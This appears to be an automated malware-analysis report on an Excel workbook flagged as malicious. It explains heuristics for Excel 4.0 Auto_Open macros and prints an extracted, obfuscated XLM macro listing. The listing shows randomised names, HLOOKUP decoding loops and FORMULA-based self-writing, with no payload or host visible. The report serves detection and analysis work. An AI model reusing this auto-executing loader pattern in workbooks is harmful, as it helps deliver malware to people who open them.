MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6600 bytes |
SHA-256: 03f07da13363dde2d93c6aed241d758985fece39e0593596dadbb52b492ed848 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 17 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - tSvfQxqJ
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F156
' 0018 20 LABEL : Cell Value, String Constant - BlFMK len=0
' 0018 26 LABEL : Cell Value, String Constant - EPHDvfTOotD len=0
' 0018 23 LABEL : Cell Value, String Constant - GgiyfvQP len=0
' 0018 25 LABEL : Cell Value, String Constant - griXAnnUVj len=0
' 0018 26 LABEL : Cell Value, String Constant - iNvUGjgVxUf len=0
' 0018 21 LABEL : Cell Value, String Constant - KeNGiU len=0
' 0018 26 LABEL : Cell Value, String Constant - nyGfYSHKQNG len=0
' 0018 23 LABEL : Cell Value, String Constant - NzrIQRsj len=0
' 0018 27 LABEL : Cell Value, String Constant - oVBnwegmkjDa len=0
' 0018 23 LABEL : Cell Value, String Constant - pLpbUCNw len=0
' 0018 22 LABEL : Cell Value, String Constant - PxGVrpT len=0
' 0018 24 LABEL : Cell Value, String Constant - QoPXDVUSq len=0
' 0018 22 LABEL : Cell Value, String Constant - rFEyMaw len=0
' 0018 25 LABEL : Cell Value, String Constant - tYaTAtoNSl len=0
' 0018 20 LABEL : Cell Value, String Constant - uycXd len=0
' 0018 25 LABEL : Cell Value, String Constant - VUUIyjMuOv len=0
' 0018 20 LABEL : Cell Value, String Constant - xWVAD len=0
' 0018 22 LABEL : Cell Value, String Constant - yZKdLKP len=0
' 0018 22 LABEL : Cell Value, String Constant - zgcGMQM len=0
' 0018 27 LABEL : Cell Value, String Constant - ZHORlgYCGGew len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' tSvfQxqJ,F63,"SET.NAME("GgiyfvQP",VALUE("0"))",""
' tSvfQxqJ,F68,"SET.NAME("nyGfYSHKQNG",GgiyfvQP)",""
' tSvfQxqJ,F73,"SET.NAME("oVBnwegmkjDa",GgiyfvQP)",""
' tSvfQxqJ,F76,"SET.NAME("rFEyMaw",COUNTA(KeNGiU))",""
' tSvfQxqJ,F80,"SET.NAME("iNvUGjgVxUf",COUNTA(pLpbUCNw))",""
' tSvfQxqJ,F84,[],""
' tSvfQxqJ,F86,"SET.NAME("VUUIyjMuOv","")",""
' tSvfQxqJ,F88,"nyGfYSHKQNG",""
' tSvfQxqJ,F93,"SET.NAME("EPHDvfTOotD",HLOOKUP("*",KeNGiU,nyGfYSHKQNG,FALSE))",""
' tSvfQxqJ,F97,"NzrIQRsj",""
' tSvfQxqJ,F100,"SET.NAME("tYaTAtoNSl",GgiyfvQP)",""
' tSvfQxqJ,F104,[],""
' tSvfQxqJ,F107,"tYaTAtoNSl",""
' tSvfQxqJ,F111,"xWVAD",""
' tSvfQxqJ,F116,"yZKdLKP",""
' tSvfQxqJ,F120,"ZHORlgYCGGew",""
' tSvfQxqJ,F125,"SET.NAME("griXAnnUVj",VALUE(HLOOKUP("*",pLpbUCNw,ZHORlgYCGGew,FALSE)))",""
' tSvfQxqJ,F127,"uycXd",""
' tSvfQxqJ,F130,"VUUIyjMuOv",""
' tSvfQxqJ,F133,"oVBnwegmkjDa",""
' tSvfQxqJ,F138,NEXT(),""
' tSvfQxqJ,F140,"BlFMK",""
' tSvfQxqJ,F144,"SET.NAME("f",INT(T(FORMULA(T(VUUIyjMuOv)&"",""&T(BlFMK)))))",""
' tSvfQxqJ,F147,"PxGVrpT",""
' tSvfQxqJ,F149,NEXT(),""
' tSvfQxqJ,F151,RETURN(),""
' tSvfQxqJ,F182,"SET.NAME("zgcGMQM",F63)",""
' tSvfQxqJ,F185,"KeNGiU",""
' tSvfQxqJ,F189,"SET.NAME("pLpbUCNw",R52C13)",""
' tSvfQxqJ,F192,"SET.NAME("PxGVrpT",201)",""
' tSvfQxqJ,F196,"SET.NAME("QoPXDVUSq",6)",""
' tSvfQxqJ,F200,zgcGMQM(),""
' tSvfQxqJ,F201,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.